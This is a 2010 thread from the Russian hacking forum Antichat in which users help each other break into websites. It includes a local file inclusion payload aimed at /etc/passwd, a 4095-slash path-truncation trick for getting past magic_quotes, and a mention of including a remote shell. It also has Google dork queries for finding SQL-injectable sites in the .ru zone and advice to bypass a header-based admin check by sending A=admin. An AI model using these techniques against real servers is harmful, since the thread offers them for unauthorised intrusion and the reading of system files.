Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
14.04.2010, 19:20
|
|
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме:
362547
Репутация:
93
|
|
что делать если такая ошибка
Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(modules/../../../../../../../etc/pass\0/copyright.php) is not within the allowed path(s): (/hosting/site.ru/htdocs/) in /hosting/site.ru/htdocs/includes/javascript.php on line 59
адрес такой: site.ru/modules.php?name=../../../../../../../etc/pass
site.ru/modules.php?name= ставлю ссылку на шелл - заплатка стоит
|
|
|
14.04.2010, 20:33
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Сообщение от hackmon
что делать если такая ошибка
Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(modules/../../../../../../../etc/pass\0/copyright.php) is not within the allowed path(s): (/hosting/site.ru/htdocs/) in /hosting/site.ru/htdocs/includes/javascript.php on line 59
адрес такой: site.ru/modules.php?name=../../../../../../../etc/pass
site.ru/modules.php?name= ставлю ссылку на шелл - заплатка стоит
https://forum.antichat.ru/thread98525.html
|
|
|
|
14.04.2010, 20:51
|
|
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме:
362547
Репутация:
93
|
|
Сообщение от Root-access
https://forum.antichat.ru/thread98525.html
не то или я не умею
|
|
|
|
14.04.2010, 22:25
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
нужен аналог софтины Netdevilz sql ScanneR, которая сканит, а потом и парсит уязвимые урлы. Работает через гугл, такие запросы, как inurl:forum.php?id= site:.ru
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
и т.д.
|
|
|
|
14.04.2010, 22:40
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
site.ru/modules.php?name=../../../../../../../etc/pass
Во первых - нету такого файла pass, есть файл passwd
Проблема в magic_quotes.
Пример для Unix сервера:
Код:
site.ru/modules.php?name=../../../../../../../etc/passwd//////////////////[..4095..]
4095 - это минимальное количество слешей.
Но подобный способ довольно таки редко получается провести.
|
|
|
|
14.04.2010, 22:49
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Сообщение от jecka3000
нужен аналог софтины Netdevilz sql ScanneR, которая сканит, а потом и парсит уязвимые урлы. Работает через гугл, такие запросы, как inurl:forum.php?id= site:.ru
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
и т.д.
тоесть sql helper 2.7, Pangolin etc...?
|
|
|
|
14.04.2010, 22:55
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
[Feldmarschall],
нет конечно.
Эти программы для тупых и для ленивых! Мне не нужно, чтобы за меня делали мою работу. Мне нужен материал, с каким нужно работать.
|
|
|
|
14.04.2010, 22:55
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Ins3t
Во первых - нету такого файла pass, есть файл passwd
Проблема в magic_quotes.
Пример для Unix сервера:
Код:
site.ru/modules.php?name=../../../../../../../etc/passwd//////////////////[..4095..]
4095 - это минимальное количество слешей.
Но подобный способ довольно таки редко получается провести.
Сообщение от hackmon
что делать если такая ошибка
Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(modules/../../../../../../../etc/pass\0/copyright.php) is not within the allowed path(s): (/hosting/site.ru/htdocs/) in /hosting/site.ru/htdocs/includes/javascript.php on line 59
адрес такой: site.ru/modules.php?name=../../../../../../../etc/pass
site.ru/modules.php?name= ставлю ссылку на шелл - заплатка стоит
нет смысла инклюдить /etc/passwd - там же написано, что open_basedir врублен.
|
|
|
|
14.04.2010, 22:56
|
|
Новичок
Регистрация: 01.04.2009
Сообщений: 14
Провел на форуме:
92038
Репутация:
10
|
|
Всем привет,
есть в общем скрипт авторизации,
исходник примерно такой:
if( @$_SERVER['HTTP_A'] != 'admin') {header("Location: notauth.php");exit;}
Что мне надо сделать чтобы в суперглобальном массиве $_SERVER['HTTP_A'] было значение 'admin', или как мне пройти авторизацию?
буду очень благодарен за любые подсказки,
|
|
|
|
14.04.2010, 22:59
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Zilt0
Всем привет,
есть в общем скрипт авторизации,
исходник примерно такой:
if( @$_SERVER['HTTP_A'] != 'admin') {header("Location: notauth.php");exit;}
Что мне надо сделать чтобы в суперглобальном массиве $_SERVER['HTTP_A'] было значение 'admin', или как мне пройти авторизацию?
буду очень благодарен за любые подсказки,
послать заголовок A=admin
Последний раз редактировалось попугай; 14.04.2010 в 23:04..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.gif){kind=avatar}
Похожие темы
Линейный вид
